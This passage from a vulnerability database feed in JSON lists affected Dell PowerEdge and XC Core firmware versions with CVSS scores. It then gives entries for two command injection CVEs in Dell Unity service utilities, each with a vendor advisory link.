[ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8610t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8610t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8620t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8620t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8545_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8545:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.0, "impactScore" : 5.2 } }, "publishedDate" : "2024-03-13T17:15Z", "lastModifiedDate" : "2025-01-31T16:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0164", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contain an OS Command Injection Vulnerability in its svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary commands with elevated privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0165", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.\n\n" } ] } }, "configurations" : { 